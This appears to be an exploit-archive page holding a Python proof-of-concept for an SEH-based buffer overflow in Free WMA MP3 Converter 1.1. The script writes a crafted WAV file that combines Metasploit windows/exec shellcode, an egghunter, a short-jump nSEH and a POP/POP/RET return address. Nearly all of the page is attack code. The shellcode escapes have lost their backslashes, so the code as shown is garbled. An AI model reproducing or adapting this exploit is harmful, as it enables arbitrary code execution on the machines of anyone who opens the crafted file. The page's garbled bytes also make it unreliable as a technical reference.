Free WMA MP3 Converter 1.1 Buffer Overflow Exploit (SEH)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Free WMA MP3 Converter 1.1 Buffer Overflow Exploit (SEH)
# Published : 2010-11-12
# Author : Dr_IDE
# Previous Title : Foxit Reader 4.1.1 Stack Buffer Overflow Exploit
# Next Title : Foxit Reader 4.1.1 Stack Overflow Exploit - Egghunter Mod

#!/usr/bin/env python
##############################################################################
#
# Free WMA MP3 Converter 1.1 Buffer Overflow Exploit (SEH)
# Coded By:     Dr_IDE
# Date:         November 10, 2010
# Download:     http://www.eusing.com/free_wma_converter/mp3_wma_converter.htm
# Tested on:    Windows XPSP3
# Greets:       edb team
# Notes:	Egghunter was for fun, not required though.
#
###############################################################################

# windows/exec - 303 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_upper
# EXITFUNC=seh, CMD=calc
# Egg is already injected
code=(
"x80x87x78x68x80x87x78x68x89xe1xd9xeexd9x71xf4x58x50x59"
"x49x49x49x49x43x43x43x43x43x43x51x5ax56x54x58x33x30x56"
"x58x34x41x50x30x41x33x48x48x30x41x30x30x41x42x41x41x42"
"x54x41x41x51x32x41x42x32x42x42x30x42x42x58x50x38x41x43"
"x4ax4ax49x4bx4cx4ax48x47x34x43x30x45x50x45x50x4cx4bx51"
"x55x47x4cx4cx4bx43x4cx45x55x42x58x45x51x4ax4fx4cx4bx50"
"x4fx45x48x4cx4bx51x4fx51x30x43x31x4ax4bx51x59x4cx4bx50"
"x34x4cx4bx43x31x4ax4ex46x51x49x50x4cx59x4ex4cx4dx54x49"
"x50x42x54x45x57x49x51x49x5ax44x4dx43x31x48x42x4ax4bx4c"
"x34x47x4bx50x54x47x54x45x54x43x45x4bx55x4cx4bx51x4fx47"
"x54x45x51x4ax4bx45x36x4cx4bx44x4cx50x4bx4cx4bx51x4fx45"
"x4cx43x31x4ax4bx4cx4bx45x4cx4cx4bx45x51x4ax4bx4cx49x51"
"x4cx46x44x44x44x48x43x51x4fx50x31x4ax56x45x30x50x56x42"
"x44x4cx4bx51x56x50x30x4cx4bx51x50x44x4cx4cx4bx44x30x45"
"x4cx4ex4dx4cx4bx43x58x45x58x4bx39x4ax58x4dx53x49x50x42"
"x4ax50x50x43x58x4ax50x4dx5ax44x44x51x4fx45x38x4ax38x4b"
"x4ex4cx4ax44x4ex50x57x4bx4fx4dx37x42x43x43x51x42x4cx42"
"x43x43x30x41x41")

eggy=(
"x66x81xCAxFFx0Fx42x52x6Ax02x58xCDx2Ex3Cx05x5Ax74xEFxB8"
"x80x87x78x68x8BxFAxAFx75xEAxAFx75xE7xFFxE7")

nops=("x90" * 8)
nseh=("xEBx06x90x90")
rseh=("xEFxF7x4Ax00")			#Universal P/P/R - Wmpcon.exe		
buf1=("x41" * 1000)
buf2=("x42" * (4116 - len(buf1+nops+code)))
junk=("x43" * (8000 - len(buf1+buf2+nseh+rseh)))

evil=(buf1+nops+code+buf2+nseh+rseh+nops+eggy+junk);

f1 = open('Dr_IDE.wav','w');
f1.write(evil);
f1.close();

#[http://pocoftehday.blogspot.com]